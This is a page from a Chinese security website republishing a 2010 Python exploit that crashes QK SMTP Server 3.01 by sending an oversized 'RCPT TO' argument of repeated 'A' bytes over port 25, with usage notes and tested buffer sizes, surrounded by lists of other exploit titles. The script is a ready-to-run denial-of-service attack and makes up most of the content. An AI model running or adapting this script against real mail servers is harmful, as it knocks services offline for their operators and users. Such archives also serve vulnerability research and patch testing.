首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
QK SMTP Server 3 RCPT TO: Command DoS
来源:vfocus.net 作者:antrhacks 发布时间:2010-09-13  
# Author: antrhacks
# Software Link: http://www.qksoft.com/qk-smtp-server/download.php
# Version: 3.01
# Platform: Windows XP SP3 Home edition Fr
# Tested with buffersize: 4500, 5000
# Example: ./QKsmtp.py 192.168.0.10 4500
# Nota: Settings > Acces IP Control > Allow your IP

#!/usr/bin/python

#--------------------------------------------
# QK SMTP Server 3 RCPT TO: Command DoS
#--------------------------------------------

# Title:  QK SMTP Server 3 RCPT TO: Command DoS
# Author: antrhacks
# Software Link: http://www.qksoft.com/qk-smtp-server/download.php
# Version: 3.01
# Platform:  Windows XP SP3 Home edition Fr
# Tested with buffersize: 4500, 5000
# Example: ./QKsmtp.py 192.168.0.10 4500
# Nota: Settings > Acces IP Control > Allow your IP

import socket
import sys



def howto():
    print ("Usage: scriptname.py <IP> <BufferSize>\n")

def exploit(host):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:
        sock.connect((host, 25))
    except:
        print ("Unable to connect to host")
        sys.exit(1)
    r=sock.recv(1024)
    print r
    r=sock.getsockname()
    print r
    sock.send("HELO localhost\r\n")
    r=sock.recv(1024)
    print r
    sock.send("MAIL FROM: hack@hack.com\r\n")
    r=sock.recv(1024)
    print r
    sock.send("RCPT TO: " + buffere + "\r\n")
    r=sock.recv(1024)
    print r
    sock.send("QUIT" + " \r\n")
    r=sock.recv(1024)
    print r
    sock.close()
        
if len(sys.argv) <> 3:
    howto()
    sys.exit(1)
else:
    host=sys.argv[1]
    buffersize=int(sys.argv[2])
    buffere= "\x41" * buffersize
    exploit(host)
    sys.exit(0)

# END


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Adobe Acrobat and Reader "push
·Prevx DLL preloading exploit
·YOPS Web Server Remote Command
·Microsoft Office Word 2007 spr
·Kingsoft Antivirus <= 2010.04.
·Webkit (Apple Safari < 4.1.2/5
·AA SMTP SERVER v.1.1 - Crash P
·Excel RTD Memory Corruption
·RealPlayer FLV Parsing Integer
·UCenter Home 2.0 SQL Injection
·RogiShip Explorer [browser] 1.
·Wordpress 3.0.1 - Remote Denia
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved